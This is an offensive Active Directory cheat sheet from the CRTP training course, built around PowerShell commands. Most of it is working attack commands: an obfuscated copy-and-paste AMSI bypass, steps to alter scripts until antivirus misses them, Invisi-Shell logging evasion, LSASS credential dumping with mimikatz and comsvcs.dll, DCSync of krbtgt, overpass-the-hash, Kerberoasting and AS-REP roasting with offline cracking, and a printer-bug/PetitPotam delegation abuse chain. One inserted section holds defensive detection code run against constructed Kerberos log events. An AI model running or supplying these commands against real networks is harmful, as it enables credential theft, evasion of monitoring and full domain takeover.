
[CRTP METHODOLOGY USING POWERSHELL]



POWERSHELL ENUMERATION

DOMAIN ENUMERATION

ACTIVE DIRECTORY POWERSHELL MODULE | ADModule
BLOODHOUND | BloodHound
  >> avoid detections like ATA (using the SharpHound collector to create the .zip file with the relationships associated)
  C1: PS> Invoke-BloodHound -CollectionMethod All -ExcludeDC
POWERVIEW | PowerView
SHARPVIEW | SharpView

::: GET CURRENT DOMAIN
C1: PS> Get-Domain        (PowerView)
C2: PS> Get-ADDomain      (Active Directory module)

::: GET OBJECT OF ANOTHER DOMAIN
C1: PS> Get-Domain -Domain
C2: PS> Get-ADDomain -Identity

::: GET DOMAIN SID FOR THE CURRENT DOMAIN
C1: PS> Get-DomainSID
C2: PS> (Get-ADDomain).DomainSID

::: GET DOMAIN POLICY FOR CURRENT DOMAIN
C1: PS> Get-DomainPolicyData
C2: PS> Get-DomainPolicy
C3: PS> (Get-DomainPolicyData).systemaccess

::: GET DOMAIN POLICY FOR ANOTHER DOMAIN
C1: PS> (Get-DomainPolicyData -domain [domain]).systemaccess

::: GET DOMAIN CONTROLLER FOR THE CURRENT DOMAIN
C1: PS> Get-DomainController
C2: PS> Get-ADDomainController

::: GET DOMAIN CONTROLLER FOR ANOTHER DOMAIN
C1: PS> Get-DomainController -Domain [domainName]
C2: PS> Get-ADDomainController -DomainName [domainName] -Discover
PS BYPASS EXECUTION & AV SIGNATURES

EXECUTION
PS> powershell -ExecutionPolicy bypass [script.ps1]
PS> powershell -c [script.ps1]

::: INVISI-SHELL
works really well to bypass:
- script block logging
- system wide transcription
invisi-shell | bypass security controls
** requires the .dll file and the execution file [admin/non-admin]:
RunWithPathAsAdmin.bat
RunWithRegistryNonAdmin.bat

::: BYPASS AV SIGNATURES
- load the script in memory to avoid AMSI
- bypass AMSI
- use AmsiTrigger to identify the part of the script that is detected
!! repeat the process until it is not detected, to avoid detection in the execution phase.

AMSITrigger quick usage:
PS> AmsiTrigger.exe -i [filePath]
FLAGS:
-i = input file
-u, --url=VALUE
-f, --format=VALUE
OUTPUT FORMAT:
1 - Only show Triggers
2 - Show Triggers with Line numbers
3 - Show Triggers inline with code
4 - Show AMSI calls (xmas tree mode)

QUICK STEPS TO BYPASS AV DETECTION WHEN MAKING CHANGES TO THE SCRIPT
1) remove comments
2) modify each use of "DumpCreds". SAMPLE: DumpCreds = DC
3) modify the name of the WIN32 API calls detected
4) reverse the strings that are detected. SAMPLE: System.AppDomain = "niamoDppA.metsyS"

::: FULL OBFUSCATION
Invoke-Obfuscation

::: AMSI BYPASS
"just copy & paste, it will let you import script without detection." works really well with PowerView.
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i') ,'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
DOMAIN ACL ENUMERATION

::: ENUMERATE ACL FOR DOMAIN ADMINS GROUP
in case another domain group is needed, just change it...
PS> Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs -Verbose

::: GET ACL ASSOCIATED WITH THE SPECIFIED OBJECT
PS> Get-DomainObjectAcl -SamAccountName [username] -ResolveGUIDs

::: GET ACL ASSOCIATED WITH THE SPECIFIED PREFIX TO BE USED FOR SEARCH
PS> Get-DomainObjectAcl -SearchBase "STRING" -ResolveGUIDs -Verbose

::: ENUMERATE ACLs USING ACTIVEDIRECTORY MODULE
*** by ObjectDN
PS> (Get-Acl 'AD:\CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access

::: SEARCH FOR INTERESTING ACEs
PS> Find-InterestingDomainAcl -ResolveGUIDs

::: FIND INTERESTING ACL ASSOCIATED TO A GROUP
PS> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "group_name"}

::: GET ACL ASSOCIATED WITH SPECIFIED PATH
PS> Get-PathAcl -Path "\\[domain]\sysvol"

::: SHOW CURRENT ACL FOR A SPECIFIC USER
PS> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -eq ""}
note: ?{$_.<property> ...} is Where-Object; it filters every result (object) on the given property
DOMAIN COMPUTER ENUMERATION

::: GET A LIST OF COMPUTERS IN THE CURRENT DOMAIN
PS> Get-DomainComputer | select Name
PS> Get-DomainComputer -OperatingSystem "*Server 2016*"
PS> Get-DomainComputer -Ping
PS> Get-ADComputer -Filter * | select Name
PS> Get-ADComputer -Filter * -Properties *
PS> Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | select Name,OperatingSystem
PS> Get-ADComputer -Filter * -Properties DNSHostname | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName}
DOMAIN FOREST ENUMERATION

-FOREST-
::: GET DETAILS ABOUT THE CURRENT FOREST
PS> Get-Forest
PS> Get-Forest -Forest
PS> Get-ADForest
PS> Get-ADForest -Identity

::: GET ALL DOMAINS IN THE CURRENT FOREST
PS> Get-ForestDomain
PS> Get-ForestDomain -Forest
PS> (Get-ADForest).Domains

::: GET ALL GLOBAL CATALOGS FOR THE CURRENT FOREST
PS> Get-ForestGlobalCatalog
PS> Get-ForestGlobalCatalog -Forest
PS> Get-ADForest | select -ExpandProperty GlobalCatalogs

::: MAP TRUSTS OF A FOREST
PS> Get-ForestTrust
PS> Get-ForestTrust -Forest [domain]
PS> Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'
DOMAIN GPO ENUMERATION

-GPO-
::: GET LIST OF GPOs IN CURRENT DOMAIN
PS> Get-DomainGPO
PS> Get-DomainGPO -ComputerIdentity [hostname]

::: GET GPOs WHICH USE RESTRICTED GROUPS OR groups.xml FOR INTERESTING USERS
PS> Get-DomainGPOLocalGroup

::: GET USERS WHICH ARE IN A LOCAL GROUP OF A MACHINE USING GPO
PS> Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity [hostname]

::: GET MACHINES WHERE THE GIVEN USER IS MEMBER OF A SPECIFIC GROUP
PS> Get-DomainGPOUserLocalGroupMapping -Identity [user] -Verbose

::: GET GPO APPLIED ON AN OU. READ THE GPO NAME FROM THE gplink ATTRIBUTE RETURNED BY Get-NetOU
PS> Get-DomainGPO -Identity "gplink/cn"
SAMPLE: PS> Get-DomainGPO -Identity {00000000-0000-0000-0000-000000000000}

::: GET gplink ATTRIBUTE OF AN OU
PS> (Get-DomainOU -Identity [OU]).gplink
DOMAIN TRUST ENUMERATION

-TRUSTS-
A trust is a relationship between two domains or forests which allows users of one domain or forest to access resources in the other domain or forest. Trusts can be automatic (parent-child, same forest, etc.) or established (forest, external).
TDO / Trusted Domain Objects represent the trust relationship in a domain.
- one way trust | users can access resources in one direction, the reverse is not allowed.
- two way trust | bi-directional access is allowed
TRANSITIVE: can be extended to establish trust relationships with other domains.
NON-TRANSITIVE: cannot be extended to other domains in the forest. Can be two-way or one-way.
> parent-child trust
> tree-root trust
  -- both use two-way transitive trust
> external trust | between two domains in different forests when the forests do not have a trust relationship; can be two-way or one-way and it is non-transitive
> forest trust | between root domains; can be one-way or two-way, transitive or non-transitive

::: GET LIST OF ALL DOMAIN TRUSTS FOR THE CURRENT DOMAIN
PS> Get-DomainTrust
PS> Get-DomainTrust -Domain [domain]
PS> Get-ADTrust
PS> Get-ADTrust -Identity [domain]

::: LIST ALL TRUSTS OF THE CURRENT FOREST (AD MODULE)
PS> Get-ADForest | %{Get-ADTrust -Filter *}

::: LIST EXTERNAL TRUSTS IN CURRENT DOMAIN
PS> Get-DomainTrust | ?{$_.TrustAttributes -eq "FILTER_SIDS"}
PS> Get-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)'

::: LIST EXTERNAL TRUSTS IN CURRENT FOREST
PS> Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} | ?{$_.TrustAttributes -eq "FILTER_SIDS"}
PS> (Get-ADForest).Domains | %{Get-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)' -Server $_}

::: MAP TRUSTS OF A FOREST
PS> Get-ForestTrust
PS> Get-ForestTrust -Forest
PS> Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'

::: MAP TRUSTS OF CURRENT DOMAIN
PS> Get-ADTrust -Filter *

::: MAP TRUSTS OF EXTERNAL TRUST
PS> Get-ADTrust -Filter * -Server [externalTrust]
DOMAIN USER ENUMERATION

::: GET LIST OF USERS IN CURRENT DOMAIN
PS> Get-DomainUser
PS> Get-DomainUser -Identity [user]
PS> Get-ADUser -Filter * -Properties *
PS> Get-ADUser -Identity [userName] -Properties *

::: GET LIST OF USERS BY NAME AND ITS COUNT
PS> Get-DomainUser | select samaccountname | measure

::: GET LIST OF A SPECIFIC PROPERTY OF USERS
PS> Get-DomainUser | select -ExpandProperty samaccountname

::: GET LIST OF PROPERTIES OF A USER IN CURRENT DOMAIN
PS> Get-DomainUser -Identity [user] -Properties *
PS> Get-DomainUser -Properties samaccountname,logonCount
||| will help to retrieve and understand the normal activity of users
PS> Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name
PS> Get-ADUser -Filter * -Properties * | select name,logoncount,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}

::: SEARCH FOR A STRING IN A USER'S ATTRIBUTE
PS> Get-DomainUser -LDAPFilter "Description=*STRING*" | select name,Description
PS> Get-ADUser -Filter 'Description -like "*STRING*"' -Properties Description | select name,Description

::: GET ACTIVELY LOGGED USERS ON A COMPUTER (NEEDS LOCAL ADMIN RIGHTS ON THE TARGET)
PS> Get-NetLoggedon -ComputerName [hostname]

::: GET LOCALLY LOGGED USERS ON A COMPUTER (NEEDS REMOTE REGISTRY ON THE TARGET - STARTED BY DEFAULT ON SERVER OS)
PS> Get-LoggedonLocal -ComputerName [hostname]

::: GET THE LAST LOGGED USER ON A COMPUTER (NEEDS ADMIN RIGHTS AND REMOTE REGISTRY ON THE TARGET)
PS> Get-LastLoggedOn -ComputerName [hostname]

::: GET USERS INFO TO CATCH DECOY USERS
PS> Get-DomainUser | select samaccountname,logoncount
DOMAIN ENUMERATION USERHUNTING

::: FIND ALL MACHINES ON THE CURRENT DOMAIN WHERE THE CURRENT USER HAS LOCAL ADMIN ACCESS
PS> Find-LocalAdminAccess -Verbose
- This function queries the DC of the current or provided domain for a list of computers (Get-NetComputer) and then uses multi-threaded "Invoke-CheckLocalAdminAccess" on each machine.
- This can also be done with the help of remote administration tools like WMI and PowerShell remoting. Pretty useful in cases where the ports (RPC and SMB) used by "Find-LocalAdminAccess" are blocked.
- See "Find-WMILocalAdminAccess.ps1" and "Find-PSRemotingLocalAdminAccess.ps1"

::: FIND COMPUTERS WHERE A DOMAIN ADMIN (OR SPECIFIED USER/GROUP) HAS SESSIONS
PS> Find-DomainUserLocation -Verbose
PS> Find-DomainUserLocation -UserGroupIdentity "[group]"
This function queries the DC of the current or provided domain for members of the given group (Domain Admins by default) using "Get-DomainGroupMember", gets a list of computers (Get-DomainComputer) and lists sessions and logged on users (Get-NetSession/Get-NetLoggedon) from each machine.

::: FIND COMPUTERS WHERE A DOMAIN ADMIN SESSION IS AVAILABLE & CURRENT USER HAS ADMIN ACCESS
PS> Find-DomainUserLocation -CheckAccess

::: FIND COMPUTERS (FILE SERVERS AND DISTRIBUTED FILE SERVERS) WHERE A DOMAIN ADMIN SESSION IS AVAILABLE
PS> Find-DomainUserLocation -Stealth
DOMAIN GROUP MEMBERS ENUMERATION

::: GET ALL GROUPS IN THE CURRENT DOMAIN
PS> Get-DomainGroup | select Name
PS> Get-DomainGroup -Domain
PS> Get-ADGroup -Filter * | select Name
PS> Get-ADGroup -Filter * -Properties *

::: GET ALL GROUPS CONTAINING THE WORD "admin" IN THE GROUP NAME
PS> Get-DomainGroup *admin*
PS> Get-ADGroup -Filter 'Name -like "*admin*"' | select Name

::: GET ALL MEMBERS OF THE DOMAIN ADMINS GROUP
PS> Get-DomainGroupMember -Identity "Domain Admins" -Recurse
PS> Get-ADGroupMember -Identity "Domain Admins" -Recursive

::: GET THE GROUP MEMBERSHIP FOR A USER
PS> Get-DomainGroup -UserName ""
PS> Get-ADPrincipalGroupMembership -Identity

::: LIST ALL LOCAL GROUPS ON A MACHINE (NEEDS ADMIN RIGHTS ON NON-DC MACHINES)
PS> Get-NetLocalGroup -ComputerName -ListGroups

::: GET MEMBERS OF ALL THE LOCAL GROUPS ON A MACHINE (NEEDS ADMIN RIGHTS ON NON-DC MACHINES)
PS> Get-NetLocalGroup -ComputerName -Recurse

::: GET MEMBERS OF THE LOCAL GROUP "Administrators" ON A MACHINE (NEEDS ADMIN RIGHTS ON NON-DC MACHINES)
PS> Get-NetLocalGroupMember -ComputerName -GroupName Administrators

::: FIND SHARES ON HOSTS IN CURRENT DOMAIN
PS> Invoke-ShareFinder -Verbose

::: FIND SENSITIVE FILES ON COMPUTERS IN THE DOMAIN
PS> Invoke-FileFinder -Verbose

::: GET ALL FILE SERVERS OF THE DOMAIN
PS> Get-NetFileServer

::: GET KERBEROS POLICY
PS> (Get-DomainPolicy).KerberosPolicy

::: GET DOMAIN ADMIN GROUPS OF THE FOREST
PS> Get-DomainGroup *admin* -domain | select samaccountname

POWERSHELL LATERAL MOVEMENT

DOMAIN LATERAL MOVEMENT

:: PowerShell remoting (PSRemoting) uses WinRM | ports: 5985 HTTP & 5986 HTTPS | required: "Enable-PSRemoting"
- two types: 1:1 | 1:many
>>> 1:1
PSSession: interactive | runs in a new process (wsmprovhost) | is stateful
PS> New-PSSession
PS> Enter-PSSession
>>> 1:many
non-interactive | fan-out remoting
PS> Invoke-Command
DOMAIN LATERAL MOVEMENT MIMIKATZ

>> invoke-mimikatz
"Invoke-Mimikatz" is a PowerShell script; using the code from ReflectivePEInjection, mimikatz is loaded reflectively into memory. All functions of mimikatz can be used from this script. (The script needs rights to dump credentials.)

>>> EXTRACTING CREDENTIALS FROM LSASS
::: DUMP CREDENTIALS ON A LOCAL MACHINE USING MIMIKATZ
PS> Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
::: USING SAFETYKATZ (minidump of LSASS and PELoader to run Mimikatz)
PS> SafetyKatz.exe "sekurlsa::ekeys"
::: DUMP CREDENTIALS USING SHARPKATZ (C# port of some of the mimikatz functions)
PS> SharpKatz.exe --Command ekeys
::: DUMP CREDENTIALS USING DUMPERT (direct system calls and API unhooking)
PS> rundll32.exe C:\Dumpert\Outflank-Dumpert.dll, Dump
::: USING PYPYKATZ (mimikatz functionality in Python)
PS> pypykatz.exe live lsa
::: USING comsvcs.dll
PS> tasklist /FI "IMAGENAME eq lsass.exe"
PS> rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump C:\Users\Public\lsass.dmp full

>>> OVERPASS-THE-HASH (OPTH)
"generate tokens from hashes or keys" - (needs admin rights)
PS> Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:us.techcorp.local /aes256:[aes256key] /run:powershell.exe"'
PS> SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256:[aes256key] /run:cmd.exe" "exit"
NOTE: these will generate a PowerShell session with logon type 9 (same as runas /netonly)
NOTE: using Rubeus.exe, the following command doesn't need elevation
PS> Rubeus.exe asktgt /user:administrator /rc4:[ntlmhash] /ptt
instead, the following needs rights
PS> Rubeus.exe asktgt /user:administrator /aes256: /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

>>> DCSync
"extract credentials from the DC without code execution on it"
::: DCSync FEATURE FOR GETTING THE KRBTGT HASH
NOTE: Domain Admins privileges are required to run DCSync
PS> Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"'
PS> SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit"
DOMAIN LATERAL MOVEMENT PSREMOTING

--POWERSHELL REMOTING--
::: USE BELOW TO EXECUTE COMMANDS OR SCRIPTBLOCKS
PS> Invoke-Command -Scriptblock {Get-Process} -ComputerName (Get-Content [list_of_servers])
::: USE BELOW TO EXECUTE SCRIPTS FROM FILES
PS> Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content [list_of_servers])
::: USE BELOW TO EXECUTE A LOCALLY LOADED FUNCTION ON THE REMOTE MACHINES
PS> Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content [list_of_servers])
::: PASSING ARGUMENTS: only positional arguments can be passed this way
PS> Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content [list_of_servers]) -ArgumentList
::: USE BELOW TO EXECUTE "stateful" COMMANDS USING Invoke-Command
PS> $Sess = New-PSSession -Computername [hostname]
PS> Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}
PS> Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name}

--POWERSHELL REMOTING TRADECRAFT--
- supports the system-wide transcripts and deep script block logging
TIP: We can use winrs in place of PSRemoting to evade the logging and still reap the benefit of 5985 being allowed between hosts
PS> winrs -remote:server1 -u:server1\administrator -p:Pass@1234 hostname

POWERSHELL PRIVESC

DOMAIN LOCAL PRIVESC

PowerUp ||| LOCAL |||
::: GET SERVICES WITH UNQUOTED PATHS AND A SPACE IN THEIR NAME
PS> Get-ServiceUnquoted -Verbose
::: GET SERVICES WHERE THE CURRENT USER CAN WRITE TO ITS BINARY PATH OR CHANGE ARGUMENTS TO THE BINARY
PS> Get-ModifiableServiceFile -Verbose
::: GET THE SERVICES WHOSE CONFIGURATION THE CURRENT USER CAN MODIFY
PS> Get-ModifiableService -Verbose
::: ABUSE FUNCTION FOR "Get-ModifiableService" & ADD OUR CURRENT DOMAIN USER TO THE LOCAL ADMINISTRATORS GROUP
PS> Invoke-ServiceAbuse -Name 'service_name' -UserName 'domain\user'
::: CHECK THE DIFFERENT OPTIONS OF THE ASSOCIATED ABUSE FUNCTION
PS> help Invoke-ServiceAbuse -Examples
::: RUN ALL CHECKS
PS> Invoke-AllChecks
::: FIND A MACHINE IN THE DOMAIN WHERE THE USER ADDED TO THE "local admin group" HAS LOCAL ADMIN ACCESS
PS> import the module and invoke "Find-PSRemotingLocalAdminAccess"
::: SHOW SECURITY DESCRIPTOR OF A SERVICE
PS> sc.exe sdshow {service_name}
PS> sc.exe sdshow snmptrap
NOTE: when checking results, if there is a fifth parenthesised entry and it ends with something similar to (;;;WD), it means "Everyone". The letters that compose each parenthesised entry are the different permissions assigned.
DOMAIN PRIVESC KERBEROAST

::: FIND USER ACCOUNTS USED AS "SERVICE ACCOUNTS"
- ActiveDirectory module
PS> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
- PowerView
PS> Get-DomainUser -SPN
::: USE RUBEUS TO LIST Kerberoast STATS
PS> Rubeus.exe kerberoast /stats
::: USE RUBEUS TO REQUEST A TGS
PS> Rubeus.exe kerberoast /user:svcadmin /simple
NOTE: To avoid detections based on Encryption Downgrade for Kerberos EType (used by the likes of ATA - 0x17 stands for rc4-hmac), look for Kerberoastable accounts that only support RC4_HMAC
PS> Rubeus.exe kerberoast /stats /rc4opsec
PS> Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec
::: KERBEROAST ALL POSSIBLE ACCOUNTS
PS> Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
::: CRACK TICKET USING JOHN THE RIPPER
PS> john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt
DOMAIN PRIVESC KERBEROAST ASREPs

If a user's UserAccountControl settings have "Do not require Kerberos preauthentication" enabled, i.e. Kerberos preauth is disabled, it is possible to grab the user's crackable AS-REP and brute-force it offline.
With sufficient rights (GenericWrite or GenericAll), Kerberos preauth can be force-disabled as well.
::: ENUMERATING ACCOUNTS WITH KERBEROS PREAUTH DISABLED
- Using PowerView
PS> Get-DomainUser -PreauthNotRequired -Verbose
- Using ActiveDirectory module
PS> Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
::: FORCE DISABLE KERBEROS PREAUTH
ENUMERATE THE PERMISSIONS FOR RDPUsers ON ACLs USING PowerView
PS> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
PS> Set-DomainObject -Identity Control1User -XOR @{useraccountcontrol=4194304} -Verbose
PS> Get-DomainUser -PreauthNotRequired -Verbose
::: REQUEST ENCRYPTED AS-REP FOR OFFLINE BRUTE-FORCE
Let's use ASREPRoast
PS> Get-ASREPHash -UserName VPN1user -Verbose
To enumerate all users with Kerberos preauth disabled and request a hash
PS> Invoke-ASREPRoast -Verbose
We can use John The Ripper to brute-force the hashes offline
PS> john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\asrephashes.txt
DOMAIN PRIVESC KERBEROAST SetSPN

- With enough rights (GenericAll/GenericWrite), a target user's SPN can be set to anything (unique in the domain).
- We can then request a TGS without special privileges. The TGS can then be "Kerberoasted".
::: ENUMERATE THE PERMISSIONS FOR RDPUsers ON ACLs USING PowerView (dev)
PS> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
::: USING PowerView (dev), SEE IF THE USER ALREADY HAS AN SPN
PS> Get-DomainUser -Identity supportuser | select serviceprincipalname
::: USING ActiveDirectory MODULE
PS> Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalName
::: SET AN SPN FOR THE USER (must be unique for the domain)
PS> Set-DomainObject -Identity support1user -Set @{serviceprincipalname='ops/whatever1'}
::: USING ActiveDirectory MODULE
PS> Set-ADUser -Identity support1user -ServicePrincipalNames @{Add='ops/whatever1'}
::: KERBEROAST THE USER
PS> Rubeus.exe kerberoast /outfile:targetedhashes.txt
PS> john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\targetedhashes.txt
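Detection counterpart to the Kerberoast, AS-REP roast and targeted-SPN notes above, added here as an example and not part of the original cheat sheet: it applies the encryption-downgrade logic from the Rubeus note (EType 0x17 = RC4-HMAC) to Security log events 4768 (AS-REQ) and 4769 (TGS-REQ). The event records, account names and source address below are constructed for the example (field names follow the Windows Security log schema); on a DC the same objects would come from Get-WinEvent.

```powershell
# Encryption types as they appear in the TicketEncryptionType field of 4768/4769.
$EtypeNames = @{
    '0x1'  = 'DES-CBC-CRC'; '0x3' = 'DES-CBC-MD5'
    '0x11' = 'AES128-CTS-HMAC-SHA1-96'; '0x12' = 'AES256-CTS-HMAC-SHA1-96'
    '0x17' = 'RC4-HMAC'; '0x18' = 'RC4-HMAC-EXP'
}
$Rc4Types = '0x17', '0x18'

function Test-KerberosRoastingEvent {
    # Classifies one 4768 or 4769 record:
    #   4769 + RC4 ticket + service is a user account (no trailing '$', not krbtgt) -> Kerberoast pattern
    #   4768 + PreAuthType 0 (no pre-authentication) + RC4                          -> AS-REP roast pattern
    # Machine-account SPNs are skipped: RC4 TGS requests to them are routine noise in many domains.
    param([Parameter(Mandatory)][pscustomobject]$Record)

    $etype  = "$($Record.TicketEncryptionType)"
    $isRc4  = $etype -in $Rc4Types
    $reason = $null
    switch ($Record.Id) {
        4769 {
            if ($isRc4 -and $Record.ServiceName -notmatch '\$$' -and $Record.ServiceName -ne 'krbtgt') {
                $reason = 'RC4 service ticket for a user-account SPN (Kerberoast pattern)'
            }
        }
        4768 {
            if ($isRc4 -and $Record.PreAuthType -eq 0) {
                $reason = 'AS-REQ without pre-authentication answered with RC4 (AS-REP roast pattern)'
            }
        }
    }
    $etypeName = $EtypeNames[$etype]
    if (-not $etypeName) { $etypeName = "unknown ($etype)" }
    [pscustomobject]@{
        Id         = $Record.Id
        Requester  = $Record.TargetUserName
        Service    = $Record.ServiceName
        Etype      = $etypeName
        Source     = $Record.IpAddress
        Suspicious = [bool]$reason
        Reason     = $reason
    }
}

function Get-KerberoastBurst {
    # Groups RC4 TGS requests for user-account SPNs by requester and source address; one
    # principal pulling many such tickets in a short window is the bulk-Kerberoast signature.
    param([Parameter(Mandatory)][object[]]$Records, [int]$Threshold = 3)
    $Records |
        Where-Object { $_.Id -eq 4769 -and "$($_.TicketEncryptionType)" -in $Rc4Types -and
                       $_.ServiceName -notmatch '\$$' -and $_.ServiceName -ne 'krbtgt' } |
        Group-Object TargetUserName, IpAddress |
        Where-Object { $_.Count -ge $Threshold } |
        ForEach-Object {
            [pscustomobject]@{
                Requester   = $_.Name
                Rc4TgsCount = $_.Count
                Services    = (($_.Group | Select-Object -ExpandProperty ServiceName | Sort-Object -Unique) -join ', ')
            }
        }
}

# Constructed sample records (not real log data); 'sqlsvc' and the addresses are invented.
$SampleEvents = @(
    [pscustomobject]@{ Id = 4769; TargetUserName = 'student1@DOLLARCORP.MONEYCORP.LOCAL'; ServiceName = 'svcadmin';      TicketEncryptionType = '0x17'; PreAuthType = $null; IpAddress = '::ffff:172.16.100.1' }
    [pscustomobject]@{ Id = 4769; TargetUserName = 'student1@DOLLARCORP.MONEYCORP.LOCAL'; ServiceName = 'support1user';  TicketEncryptionType = '0x17'; PreAuthType = $null; IpAddress = '::ffff:172.16.100.1' }
    [pscustomobject]@{ Id = 4769; TargetUserName = 'student1@DOLLARCORP.MONEYCORP.LOCAL'; ServiceName = 'sqlsvc';        TicketEncryptionType = '0x17'; PreAuthType = $null; IpAddress = '::ffff:172.16.100.1' }
    [pscustomobject]@{ Id = 4769; TargetUserName = 'student1@DOLLARCORP.MONEYCORP.LOCAL'; ServiceName = 'DCORP-APPSRV$'; TicketEncryptionType = '0x12'; PreAuthType = $null; IpAddress = '::ffff:172.16.100.1' }
    [pscustomobject]@{ Id = 4768; TargetUserName = 'VPN1user'; ServiceName = 'krbtgt'; TicketEncryptionType = '0x17'; PreAuthType = 0; IpAddress = '::ffff:172.16.100.1' }
    [pscustomobject]@{ Id = 4768; TargetUserName = 'appadmin'; ServiceName = 'krbtgt'; TicketEncryptionType = '0x12'; PreAuthType = 2; IpAddress = '::ffff:172.16.99.20' }
)

# Per-event verdicts: the three RC4 TGS for user SPNs and the pre-auth-less AS-REQ are flagged,
# the AES ticket for the machine account and the normal AS-REQ are not.
$SampleEvents | ForEach-Object { Test-KerberosRoastingEvent -Record $_ } |
    Where-Object Suspicious | Format-Table Id, Requester, Service, Etype, Reason -AutoSize

# Burst view: student1 from one address requested RC4 tickets for three user SPNs.
Get-KerberoastBurst -Records $SampleEvents -Threshold 3 | Format-Table -AutoSize
```

The /rc4opsec trick in the notes only avoids the per-ticket downgrade check (the accounts genuinely have RC4-only keys), so the burst grouping is the rule that still fires in that case.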
DOMAIN PRIVESC KERBEROS DELEGATION

Delegation allows to "reuse the end-user credentials to access resources hosted on a different server".

GENERAL/BASIC OR UNCONSTRAINED DELEGATION: allows the first hop server to request access to any service on any computer in the domain.
>>> When unconstrained delegation is enabled, the DC places the user's TGT inside the TGS (Step 4 in the previous diagram). When presented to the server with unconstrained delegation, the TGT is extracted from the TGS and stored in LSASS. This way the server can reuse the user's TGT to access any other resource as the user.
::: DISCOVER DOMAIN COMPUTERS WHICH HAVE UNCONSTRAINED DELEGATION ENABLED USING POWERVIEW
PS> Get-DomainComputer -UnConstrained
::: USING Active Directory MODULE
PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True}
PS> Get-ADUser -Filter {TrustedForDelegation -eq $True}
- Compromise the server(s) where unconstrained delegation is enabled.
- We must trick or wait for a domain admin to connect to a service on appsrv.
Now, if the command is run again
PS> Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
the DA token could be reused
PS> Invoke-Mimikatz -Command '"kerberos::ptt C:\Users\appadmin\Documents\user1\[0;2ceb8b3]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi"'

::: PRINTER BUG
A feature of MS-RPRN which allows any domain user (Authenticated User) to force any machine (running the Spooler service) to connect to a second machine of the domain user's choice.
CAPTURE THE TGT OF dcorp-dc$ BY USING RUBEUS ON dcorp-appsrv
reference: https://github.com/GhostPack/Rubeus
PS> Rubeus.exe monitor /interval:5 /nowrap
...and after that run MS-RPRN.exe on the student VM.
reference: https://github.com/leechristensen/SpoolSample
PS> MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local
COPY THE base64 ENCODED TGT, REMOVE EXTRA SPACES (if any) AND USE IT ON THE STUDENT VM
PS> Rubeus.exe ptt /ticket:
ONCE THE TICKET IS INJECTED, RUN DCSync
PS> Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

::: PETITPOTAM
We can also use PetitPotam.exe on dcorp-appsrv
reference: https://github.com/topotam/PetitPotam
PS> PetitPotam.exe dcorp-appsrv dcorp-dc
On dcorp-appsrv
PS> Rubeus.exe monitor /interval:5
"PetitPotam uses the EfsRpcOpenFileRaw function of the MS-EFSRPC (Encrypting File System Remote Protocol) protocol and doesn't need credentials when used against a DC"

CONSTRAINED DELEGATION: allows the first hop server (web server in our example) to request access only to specified services on specified computers. If the user is not using Kerberos authentication to authenticate to the first hop server, Windows offers Protocol Transition to transition the request to Kerberos.
DOMAIN OFFENSIVE .NET AV BYPASS - STRING MANIPULATION

DEFENDER CHECK
